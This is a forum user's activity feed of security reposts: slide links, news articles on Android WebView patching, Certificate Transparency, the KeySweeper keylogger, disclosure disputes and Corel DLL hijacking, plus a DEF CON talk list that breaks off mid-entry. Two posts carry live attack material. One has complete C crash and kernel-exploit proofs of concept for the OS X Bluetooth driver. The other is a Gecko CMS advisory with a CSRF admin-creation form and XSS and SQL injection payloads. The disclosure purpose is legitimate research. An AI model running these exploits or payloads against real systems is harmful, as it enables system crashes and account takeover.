Jump to content

Aerosol

Active Members
 View Profile  See their activity

  • Posts

    3453

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Everything posted by Aerosol

  1. Aerosol
    Free Use This slide deck can be used by any operator to help empower their teams, teach their staff, or work with their customers. It is part of the next generation of NANOG Security Curriculum …. providing tools that can improve the quality of the Internet. Goal Provide 10 core techniques/task that any SP can do to improve their resistance to security issues. These 10 core techniques can be done on any core routing vendor’s equipment. Each of these techniques have proven to make a difference. read more: https://www.nanog.org/meetings/nanog43/presentations/SP-Security-101-Primer-1-8-1.pdf
  2. Aerosol
    Risks vary based on the mobile device and its use. Some risks include: • A lost mobile device • A stolen mobile device • Inadvertently downloading viruses or other malware • Unintentional disclosure to unauthorized users • Using an unsecured Wi-Fi network Read more: http://www.healthit.gov/sites/default/files/mobile_devices_and_health_information_privacy_and_security.pdf
  3. Aerosol
    Security: We must secure our computers with technology in the same way that we secure the doors to our offices Safety: We must act in ways that protect us against the risks and threats that come with Internet use Read more: https://www.bowdoin.edu/it/fyi/information-security/pdf/internet-safety-presentation.pdf
  4. Aerosol
    Definition of Information Security Information security is the protection of information and systems from unauthorized access, disclosure, modification, destruction or disruption. The three objectives of information security are: • Confidentiality • Integrity • Availability read more: http://www.cmu.edu/iso/aware/presentation/tepperphd.pdf
  5. Aerosol
    Introduction to the problem Our own experiences over the last 5 years Conclusion Read more : https://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf
  6. Aerosol
    OS X 10.10 Bluetooth DispatchHCIWriteStoredLinkKey - Crash PoC /* * lpe-issue1.c * Written for Mac OS X Yosemite (10.10.1) by @ joystick and @ rpaleari. * * Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() * * gcc -Wall -o lpe-issue1{,.c} -framework IOKit * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> #define SIZE 0x1000 struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; #ifndef bswap64 # define bswap64(num) \ ( (((uint64_t)(num) << 56) ) \ | (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000)) \ | (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000)) \ | (((uint64_t)(num) << 8) & UINT64_C(0x000000FF00000000)) \ | (((uint64_t)(num) >> 8) & UINT64_C(0x00000000FF000000)) \ | (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000)) \ | (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00)) \ | (((uint64_t)(num) >> 56) ) ) #endif void create_requests(io_connect_t port) { struct BluetoothCall a; uint32_t i; kern_return_t kr; for (i = 0; i < 7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* DispatchHCIRequestCreate() */ a.index = 0x0; *(uint64_t *)a.args[0] = 5*1000; /* Timeout */ memset((void *)a.args[1], 0x81, 0x1000); memset((void *)a.args[2], 0x82, 0x1000); memset((void *)a.args[3], 0x83, 0x1000); memset((void *)a.args[4], 0x84, 0x1000); memset((void *)a.args[5], 0x85, 0x1000); memset((void *)a.args[6], 0x86, 0x1000); for(i = 0; i < 500; i++) { kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ if(kr == 0xe00002bd) /* Full */ break; } } int main(void) { struct BluetoothCall a; int i; void *landing_page = calloc(SIZE, sizeof(char)); /* Init a */ for (i = 0; i < 7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } /* Populating with fake requests. */ create_requests(port); /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */ a.index = 42; /* Req number */ *((uint32_t *)a.args[0]) = 1; /* num_of_keys */ *((uint32_t *)a.args[1]) = 0x20; /* Padding */ memset((void *)a.args[3], 0x33, 152); /* mov rdi, [r14+0AB8h] */ *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page); /* mov rax, [rdi] */ *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page; /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */ *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242; /* Here some fixing to the vtable is required to return cleanly after the exploit */ #if 0 /* Debug print */ for(i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); #endif kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); } Source OS X 10.10 Bluetooth DispatchHCICreateConnection - Crash PoC /* * crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @ rpaleari and @ joystick. * * Exploits a missing check in * IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic. * * gcc -Wall -o crash-issue1{,.c} -framework IOKit */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> #define SIZE 0x1000 struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; int main(void) { /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); struct BluetoothCall a; int i; for (i=0; i<7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* This value causes IOMalloc() to fail */ a.args[6] = 0x0; a.sizes[6] = 0x80000041; a.index = 0x06; /* DispatchHCICreateConnection() */ for(i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); } Source OS X 10.10 Bluetooth TransferACLPacketToHW - Crash PoC /* * crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @ rpaleari and @ joystick. * * Exploits a missing check in * IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic. * * gcc -Wall -o crash-issue3{,.c} -framework IOKit * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; int main(void) { /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); struct BluetoothCall a; memset(&a, 0, sizeof(a)); a.sizes[0] = 0x1000; a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); a.sizes[1] = 0x1000; a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); memset((void *)a.args[1], 0x22, 0x1000); /* Call DispatchHCISendRawACLData() */ a.index = 0x63; /* Debug */ for(int i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); fflush(stdout); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ sizeof(a), /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); } Source OS X 10.10 Bluetooth BluetoothHCIChangeLocalName - Crash PoC /* * crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @ rpaleari and @ joystick. * * Triggers a panic overwriting a stack_canary. * * gcc -Wall -o crash-issue2{,.c} -framework IOKit * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; int main(void) { /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); struct BluetoothCall a; a.sizes[0] = 0x1000; a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); /* This arguments overflows a local buffer and the adjacent stack canary */ a.sizes[1] = 264; a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); memset((void *)a.args[1], 'A', a.sizes[1]); /* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */ a.index = 0x2d; /* Debug */ for(int i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); fflush(stdout); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ sizeof(a), /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); } Source
      • 1
      • Upvote
  7. Aerosol
    ?Gecko CMS 2.3 Multiple Vulnerabilities Vendor: JAKWEB Product web page: http://www.cmsgecko.com Affected version: 2.3 and 2.2 Summary: Gecko CMS is the way to go, forget complicated, bloated and slow content management systems, Gecko CMS has been build to be intuitive, easy to use, extendable to almost anything, running on all standard web hosting (PHP and one MySQL database, Apache is a plus), browser compatibility and fast, super fast! Desc: Gecko CMS suffers from multiple vulnerabilities including Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting and SQL Injection. Tested on: Apache/2 PHP/5.4.36 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @ zeroscience Advisory ID: ZSL-2015-5222 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php[/url] 27.12.2014 --- CSRF Add Admin: =============== <html> <body> <form action="http://server/admin/index.php?p=user&sp=newuser" method="POST"> <input type="hidden" name="jak_name" value="Testingus2" /> <input type="hidden" name="jak_email" value="test2@test.test" /> <input type="hidden" name="jak_username" value="Testusername2" /> <input type="hidden" name="jak_usergroup" value="3" /> <input type="hidden" name="jak_access" value="1" /> <input type="hidden" name="jak_password" value="123123" /> <input type="hidden" name="jak_confirm_password" value="123123" /> <input type="hidden" name="save" value="" /> <input type="submit" value="Submit form" /> </form> </body> </html> usergroup 4 = moderator 3 = administrator 2 = member standard 1 = guest 5 = banned Stored XSS (params: jak_img, jak_name, jak_url): ================================================ POST [url]http://server/admin/index.php?p=categories&sp=newcat[/url] HTTP/1.1 jak_catparent 0 jak_catparent2 0 jak_footer 1 jak_img "><script>alert(1);</script> jak_lcontent <p>test</p> jak_lcontent2 jak_menu 1 jak_name "><script>alert(2);</script> jak_name2 jak_url "><script>alert(3);</script> jak_varname ZSL save SQL Injection (params: jak_delete_log[], ssp): ============================================== POST /admin/index.php?p=logs&sp=s HTTP/1.1 delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1 -- GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1 Reflected XSS: ============== /admin/index.php [horder%5B%5D parameter] /admin/index.php [jak_catid parameter] /admin/index.php [jak_content parameter] /admin/index.php [jak_css parameter] /admin/index.php [jak_delete_log%5B%5D parameter] /admin/index.php [jak_email parameter] /admin/index.php [jak_extfile parameter] /admin/index.php [jak_file parameter] /admin/index.php [jak_hookshow%5B%5D parameter] /admin/index.php [jak_img parameter] /admin/index.php [jak_javascript parameter] /admin/index.php [jak_lcontent parameter] /admin/index.php [jak_name parameter] /admin/index.php [jak_password parameter] /admin/index.php [jak_showcontact parameter] /admin/index.php [jak_tags parameter] /admin/index.php [jak_title parameter] /admin/index.php [jak_url parameter] /admin/index.php [jak_username parameter] /admin/index.php [real_hook_id%5B%5D parameter] /admin/index.php [sp parameter] /admin/index.php [sreal_plugin_id%5B%5D parameter] /admin/index.php [ssp parameter] /admin/index.php [sssp parameter] /js/editor/plugins/filemanager/dialog.php [editor parameter] /js/editor/plugins/filemanager/dialog.php [field_id parameter] /js/editor/plugins/filemanager/dialog.php [fldr parameter] /js/editor/plugins/filemanager/dialog.php [lang parameter] /js/editor/plugins/filemanager/dialog.php [popup parameter] /js/editor/plugins/filemanager/dialog.php [subfolder parameter] /js/editor/plugins/filemanager/dialog.php [type parameter] Source
  8. Aerosol
    Hackers may have a perpetual shooting gallery of unpatched Android vulnerabilities at their disposal after it was disclosed today that Google no longer will provide WebView patches for older versions of its operating system. Researchers at Rapid7 have made mincemeat of WebView in Android Jelly Bean, versions 4.0-4.3, and earlier. WebView is the component used to render webpages on Android devices. The Metasploit Framework, which is owned by Rapid7, contains 11 WebView exploits, most of them courtesy of researchers Rafay Baloch and Joe Vennix. WebView, however, has been replaced in Android starting with version 4.4, known as KitKat. The new component comes from the Chromium code base and is the same as the one used in the Chrome browser. Google told Rapid7 researchers recently upon receipt of another pre-4.4 bug report that it would no longer patch WebView vulnerabilities and would support only KitKat and the latest version of Android, Lollipop. “If the affected version [of WebView] is before 4.4, we generally do not develop the patches ourselves, but welcome patches with the report for consideration,” said Google’s response to the bug submission according to Tod Beardsley, senior manager of engineering at Rapid7. “Other than notifying OEMs, we will not be able to take action on any report that is affecting versions before 4.4 that are not accompanied with a patch.” Putting the onus on OEMs may be in line with Google’s business model of supporting only current versions of its OS—Google provides patches for its Nexus devices and work with OEMs identifying vulnerabilities in older versions of Android—but it’s hardly a comfort for Android device owners. “Yes, it’s certainly a big deal for affected users, but not directly Google’s fault or responsibility,” said Jon Oberheide, CTO of Duo Security. “Google maintains the AOSP code, where this vulnerability is patched, and it’s up the the OEMs to patch their respective devices and ensure the OTA updates are delivered by carriers. Relying on carriers to deliver updates, however, has been a fool’s errand. Very few follow through with updates despite the best efforts of the federal government to crack down on major carriers and handset makers for their lack of cooperation. “Unfortunately, as we’ve seen in the past (eg. from our X-Ray project), OEMs and carriers are quite terrible at timely patching of security vulnerabilities so these will likely go unpatched for some time, if not indefinitely, leaving users exposed,” Oberheide said. The U.S. Federal Trade Commission in 2013 hammered handset maker HTC for failing to address vulnerabilities in its Android mobile devices that exposed consumers to malware attacks, the loss of personal information and even physical harm in stalking cases. The two parties reached a costly settlement for HTC which was ordered to develop and release patches for its devices, establish a security program and submit to regular security assessments for 20 years. Later that year, the American Civil Liberties Union (ACLU) filed a complaint with the FTC calling out Verizon, AT&T, Sprint-Nextel and TMobile for their reluctance in patching Android vulnerabilities. The complaint asked the FTC to force carriers to warn users about unpatched vulnerabilities and give customers the option to leave their carrier contracts behind in such cases, without penalties. Beardsley said Google told Rapid7 that it no longer certifies third-party devices that include the Android browser and updating to the latest Android version is the best way to stay up to date on security. “On its face, this seems like a reasonable decision. Maintaining support for a software product that is two versions behind would be fairly unusual in both the proprietary and open source software worlds; heck, many vendors drop support once the next version is released, and many others don’t have a clear End-Of-Life (EOL) policy at all,” Beardsley said. However, according to the Android Developers Dashboard, 60 percent of Android users are on Jelly Bean 4.3 or older, an estimate of 930 million out of date Android devices, Beardsley said. “The update chain for Android already requires the handset manufacturers and service carriers to sign off on updates that are originated from Google, and I cannot imagine this process will be improved once Google itself has opted out of the patching business,” Beardsley said. “After all, is AT&T or Motorola really more likely to incorporate a patch that comes from some guy on the Internet?” Source
  9. Aerosol
    The Certificate Transparency scheme proposed by Google engineers has taken a couple of significant steps forward recently, with the approval of the first independent certificate log and the passing of a deadline for all extended validation certificates to be CT-compliant or lose the green indicator in Google Chrome. On Jan. 1, a CT log operated by DigiCert, a Utah certificate authority, became operational, making it the first non-Google CT log to be approved. The approval is an important step, as part of the CT scheme requires that two-year extended validation certificates have proofs from three separate logs. Google currently operates two logs of its own. Certificate Transparency is designed to help solve some of the trust issue associated with the CA system. One feature of the framework is that in order to be compliant, CAs need to submit the certificates they issue to logs, all of which are publicly auditable and cryptographically assured. This can address the problem of fraudulent or mistakenly issued certificates, as all of the certificates are out in the open. This is especially important for EV certificates, which require more research by the CA before they’re issued and are valid for several years. So for CAs who issue EV certificates, anything issued before Jan. 1 should be whitelisted, but certificates issued since Jan. 1 must be CT-compliant or they will lose the green approval indicator in Chrome. “The log approval process is a long one. They test your log to make sure it’s up every second,” said Jeremy Rowley, vice president of business development at DigiCert. “You have to make a lot of adjustments to the code too. If you just use the open source code from Google, the log will collapse.” For CAs that may not have been aware of the deadline or weren’t ready in time, the changes in Chrome could create some issues for sites. “Yes, there could be some chaos. Not every CA is trusted by our log, so those that aren’t and try to issue two-year certs will have some problems,” Rowley said. “It might take some of them by surprise, some customers by surprise. Right now, you can still do one-year certs by hitting both Google logs. Most sites will be fine, but some secured by smaller CAs could have issues. But if the CA did their job right, you shouldn’t see any downtime of the green bar.” Another deadline looms this summer, as well. After July 1, all proofs for EV certificates have to come from independent logs. These proofs aren’t required for normal, non-EV certificates, but that could come online in the future. Mozilla also has committed to supporting CT in Firefox in future releases, but the feature won’t be enabled by default at first. Source
  10. Aerosol
    Hardware hacker and security researcher Samy Kamkar has released a slick new device that masquerades as a typical USB wall charger but in fact houses a keylogger capable of recording keystrokes from nearby wireless keyboards. The device is known as KeySweeper and Kamkar has released the source code and instructions for building one of your own. The components are inexpensive and easily available, and include an Arduino microcontroller, the charger itself and a handful of other bits. When it’s plugged into a wall socket, the KeySweeper will connect to a nearby Microsoft wireless keyboard and passively sniff, decrypt and record all of the keystrokes and send them back to the operator over the Web. “KeySweeper has the capability to send SMS alerts upon certain keystrokes being typed, e.g. “www.site.com”. If KeySweeper is removed from AC power, it appears to shut off, however it continues to operate covertly using an internal battery that is automatically recharged upon reconnecting to AC power,” Kamkar said in a post explaining the new device. Wireless keyboards have become a popular option for users wanting to connect to a laptop. Kamkar said he picked Microsoft’s keyboards after going into Best Buy and seeing which models seemed to be the most prevalent. The effective range of the KeySweeper device is likely about the typical range of a Bluetooth device, he said, but that could be extended using a low-noise amplifier. The KeySweeper project builds on previous work from Travis Goodspeed and Thorsten Schröder and Max Moser. Kamkar spells out the process for determining the kind of chip that the keyboard is using and the frequency and protocol it’s using to communicate with the USB dongle. With that done, he then set about figuring out how to decrypt the keystrokes, which are encrypted as they move from the keyboard to the dongle. “Thorsten and Max discovered the keystrokes are simply encrypted (xor’d) with the MAC address in ECB mode, which we are able to sniff after using Travis’ method of abusing the nRF24L01+ to both sniff and reveal MAC addresses. This “encryption” is the equivalent of taking a deck of cards, cutting it once, and calling it shuffled,” Kamkar said. “After further investigation, I found that since we now know all Microsoft keyboards begin with 0xCD as the MAC address, the actual keystroke (in orange below) happens to be aligned with the first byte of the MAC address (0xCD). This means even if we do not know the MAC address, we can decrypt the keystroke, as the alignment will never change, and 0xCD is always the first byte of the MAC.” The hardware portion of KeySweeper is designed to be as inconspicuous as possible, and Kamkar said it can be built with or without the GSM motherboard. He warns that the device can be dangerous because it doesn’t necessarily meet normal electrical standards and users without a good electrical background shouldn’t try to build one. “KeySweeper uses extremely low-power and low profile hardware to remain as covert as possible. KeySweeper can be operated from a battery, or from ~3-20V DC power. Because we wish to keep KeySweeper powered at all times, we stealthily install it inside of an innocent wall USB charger which we expect to be always plugged in,” he said. “In the case that the USB charger is unplugged, KeySweeper stealthily continues its operation using its (optional) internal battery. The moment KeySweeper is plugged back in, it switches back over to using AC power, and simultaneously recharges the battery.” Kamkar, who has released a number of other hardware-based attack tools such as SkyJack and USBdriveby, said via email that there’s not a practical way to detect the KeySweeper attack. “No, there is no way to detect the attack unfortunately (or fortunately, depending on which side of the table you’re sitting),” he said. Source
  11. Aerosol
    Microsoft yesterday excoriated Google for disclosing information about a Windows security vulnerability just days ahead of the Patch Tuesday release slated to fix the bug. The rebuke came in the form of a Technet blogpost calling for better coordinated vulnerability disclosure. In reality, the tiff represents a showdown between the two tech giants over differing bug disclosure policies and security philosophies. Briefly put, Microsoft believes that no security vulnerability should be made public before the affected vendor has issued a patch or bulletin resolving the issue. Google on the other hand, has a policy of publishing their security research findings 90 days after reporting a problem to the affected vendor. It may seem a small difference – one company offers vendors the chance to fix bugs while the other waits until the vendor has fixed the bugs before releasing vulnerability details. However, the disagreement embodies a larger and longstanding debate within the security community: so-called responsible disclosure versus full or public disclosure. “Those in favor of full, public disclosure believe that this method pushes software vendors to fix vulnerabilities more quickly and makes customers develop and take actions to protect themselves,” said Chris Betz, senior director of the Microsoft Security Resource Center. “We disagree. Releasing information absent context or a stated path to further protections, unduly pressures an already complicated technical environment.” In essence, Microsoft’s position is that pre-patch public bug disclosures provide all the information necessary for criminals to exploit vulnerabilities, and, therefore, put users at risk of attack. In this particular instance, Google published the details of a privilege elevation vulnerability in Windows just days before Microsoft’s well-known, monthly patch Tuesday security update release. “Specifically, we asked Google to work with us to protect customers by withholding details until Tuesday, January 13, when we will be releasing a fix,” Betz claimed. “Although following through keeps to Google’s announced timeline for disclosure, the decision feels less like principles and more like a ‘gotcha’, with customers the ones who may suffer as a result.” Threatpost reached out to Google, but the search giant did not respond to our request for comment before publication. However, Robert Graham, a security researcher at Errata Security wrote in a blogpost yesterday that “Microsoft forced a self-serving vulnerability disclosure policy on the industry 10 years ago, but cries foul when Google does the same today.” Graham claims that for a long time, beginning perhaps a decade ago, Microsoft dictated the terms of the vulnerability disclosure process. It employed most of the security experts, he says, either directly or through consultancies. It built the vast majority of the software platforms. And companies depended on Microsoft to develop security products for Windows. “Microsoft is powerless to threaten the industry,” Graham wrote. “It’s now Google who sets the industry’s standard for reporting vulnerabilities. Their policy is that after 90 days, vulnerabilities will be reported regardless if the vendor has fixed the bug. This applies even to Google itself when researchers find bugs in products like Chrome.” The reason, Graham claims, that Google is comfortable with its 90-day bug disclosure timeframe is that the company deploys more modern and agile processes to develop software. Changes in Google products, he says, are tested automatically and shipped to customers within 24 hours. Microsoft on the other hand, he says, continues to rely on a slow, manual process for software changes. “Google’s standard doesn’t affect everyone equally,” Graham argued, “it hits old vendors like Microsoft the hardest.” “I enjoyed reading Microsoft’s official response to this event, full of high-minded rhetoric why Google is bad, and why Microsoft should be given more time to fix bugs,” Graham wrote on the Errata Security blog. “It’s just whining — Microsoft’s alternative disclosure policy is even more self-serving than Google’s. They are upset over their inability to adapt and fix bugs in a timely fashion. They resent how Google exploits its unfair advantage. Since Microsoft can’t change their development, they try to change public opinion to force Google to change.” Source
  12. Aerosol
    Researchers from Core Security have disclosed DLL hijacking vulnerabilities in several applications made by Corel Software after the vendor didn’t respond to Core’s notifications about the flaws. There are no patches available for the bugs, which can allow remote code execution. Corel sells a variety of graphics, design and video apps, including CorelDRAW, Photo-Paint and CAD, and security researchers at Core discovered that many of the apps contain a DLL hijacking vulnerability that can be triggered when a user opens a malicious DLL. “When a file associated with the Corel software is opened, the directory of that document is first used to locate DLLs, which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document,” the advisory from Core says. “This vulnerability is caused by a DLL Hijacking when a file associated with any of the following Corel applications is executed (CorelDRAW X7, Corel Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or Corel PDF Fusion). The affected application should not be running for the vulnerability to work. The Corel software looks for a DLL file called ‘wintab32.dll’ and does not control its path, therefore allowing to copy a malicious DLL file with the same name inside the folder where the associated file is. The DLL is executed within the context of the application.” The vulnerability affects many of Corel’s apps, including: Corel DRAW X7 Corel Photo-Paint X7 Corel PaintShop Pro X7 Corel CAD 2014 Corel Painter 2015 Corel PDF Fusion Corel VideoStudio PRO X7 Corel FastFlick The Core researchers contacted Corel about the vulnerabilities on Dec. 9, with no response, and again on Dec. 17, and again got no answer. They made a third attempt to contact Corel through Twitter, with no success, and released the advisory on Monday. There are no patches available for the vulnerabilities. Source
  13. Aerosol
    Protecting SCADA From the Ground Up – PDF Detecting Bluetooth Surveillance Systems – PDF Dropping Docs on Darknets: How People Got Caught – PDF Hacking 911: Adventures in Disruption, Destruction, and Death – PDF How to Disclose an Exploit Without Getting in Trouble – PDF Reverse Engineering Mac Malware – PDF NSA Playset: PCIe – PDF The Monkey in the Middle: A pentesters guide to playing in traffic. – PDF Investigating PowerShell Attacks – PDF Is This Your Pipe? Hijacking the Build Pipeline. – PDF Screw Becoming A Pentester – When I Grow Up I Want To Be A Bug Bounty Hunter! – PDF Home Alone with localhost: Automating Home Defense – PDF Meddle: Framework for Piggy-back Fuzzing and Tool Development – PDF Instrumenting Point-of-Sale Malware: A Case Study in Communicating Malware Analysis More Effectively – PDF White Paper One Man Shop: Building an effective security program all by yourself – PDF RF Penetration Testing, Your Air Stinks – PDF Touring the Darkside of the Internet. An Introduction to Tor, Darknets, and Bitcoin – PDF USB for all! – PDF ShareEnum: We Wrapped Samba So You Don’t Have To – PDF An Introduction to Back Dooring Operating Systems for Fun and Trolling – PDF Android Hacker Protection Level 0 – PDF Anatomy of a Pentest; Poppin’ Boxes like a Pro – PDF Bug Bounty Programs Evolution – PDF Extras Practical Foxhunting 101 – PDF Client-Side HTTP Cookie Security: Attack and Defense – PDF Bypass firewalls, application white lists, secure remote desktops under 20 seconds – PDF PropLANE: Kind of keeping the NSA from watching you pee – PDF Getting Windows to Play with Itself: A Hacker’s Guide to Windows API Abuse – PDF Weaponizing Your Pets: The War Kitteh and the Denial of Service Dog – PDF Through the Looking-Glass, and What Eve Found There – PDF White Paper Summary of Attacks Against BIOS and Secure Boot – PDF I am a legend: Hacking Hearthstone with machine learning – PDF The Secret Life of Krbtgt – PDF The $env:PATH less Traveled is Full of Easy Privilege Escalation Vulns – PDF Hacking US (and UK, Australia, France, etc.) traffic control systems – PDF The Cavalry Year[0] & a Path Forward for Public Safety – PDF NSA Playset: DIY WAGONBED Hardware Implant over I2C – PDF Abuse of Blind Automation in Security Tools – PDF Why Don’t You Just Tell Me Where The ROP Isn’t Suppose To Go – PDF Steganography in Commonly Used HF Radio Protocols – PDF Extras Saving Cyberspace by Reinventing File Sharing – PDF Empowering Hackers to Create a Positive Impact – PDF Just What The Doctor Ordered? – PDF Check Your Fingerprints: Cloning the Strong Set – PDF Shellcodes for ARM: Your Pills Don’t Work on Me, x86 – PDF Blowing up the Celly – Building Your Own SMS/MMS Fuzzer – PDF Mass Scanning the Internet: Tips, Tricks, Results – PDF Deconstructing the Circuit Board Sandwich: Effective Techniques for PCB Reverse Engineering – PDF Saving the Internet (for the Future) – PDF Burner Phone DDOS 2 dollars a day : 70 Calls a Minute – PDF Hack All The Things: 20 Devices in 45 Minutes – PDF Stolen Data Markets: An Economic and Organizational Assessment – PDF Raspberry MoCA – A recipe for compromise – PDF White Paper 1 White Paper 2 Girl… Fault-Interrupted. – PDF Extreme Privilege Escalation On Windows 8/UEFI Systems – PDF White Paper NinjaTV – Increasing Your Smart TV’s IQ Without Bricking It – PDF Oracle Data Redaction is Broken – PDF Weird-Machine Motivated Practical Page Table Shellcode & Finding Out What’s Running on Your System – PDF Catching Malware En Masse: DNS and IP Style – PDF White Paper Attacking the Internet of Things using Time – PDF Open Source Fairy Dust – PDF Learn how to control every room at a luxury hotel remotely: the dangers of insecure home automation deployment – PDF White Paper Generating ROP payloads from numbers – PDF DEF CON Comedy Jam Part VII, Is This The One With The Whales? – PDF The NSA Playset: RF Retroreflectors – PDF 1 PDF 2 VoIP Wars: Attack of the Cisco Phones – PDF Playing with Car Firmware or How to Brick your Car – PDF Measuring the IQ of your Threat Intelligence feeds – PDF Secure Because Math: A Deep Dive On Machine Learning-Based Monitoring – PDF Abusing Software Defined Networks – PDF NSA Playset : GSM Sniffing – PDF Cyberhijacking Airplanes: Truth or Fiction? – PDF Am I Being Spied On? Low-tech Ways Of Detecting High-tech Surveillance – PDF Detecting and Defending Against a Surveillance State – PDF Acquire current user hashes without admin privileges – PDF You’re Leaking Trade Secrets – PDF Veil-Pillage: Post-exploitation 2.0 – PDF From Raxacoricofallapatorius With Love: Case Studies In Insider Threat – PDF Don’t DDoS Me Bro: Practical DDoS Defense – PDF Advanced Red Teaming: All Your Badges Are Belong To Us – PDF I Hunt TR-069 Admins: Pwning ISPs Like a Boss – PDF The Only Way to Tell the Truth is in Fiction: The Dynamics of Life in the National Security State – PDF A Journey to Protect Points-of-sale – PDF Impostor — Polluting Tor Metadata – PDF Domain Name Problems and Solutions – PDF White Paper Optical Surgery; Implanting a DropCam – PDF Manna from Heaven: Improving the state of wireless rogue AP attacks – PDF The 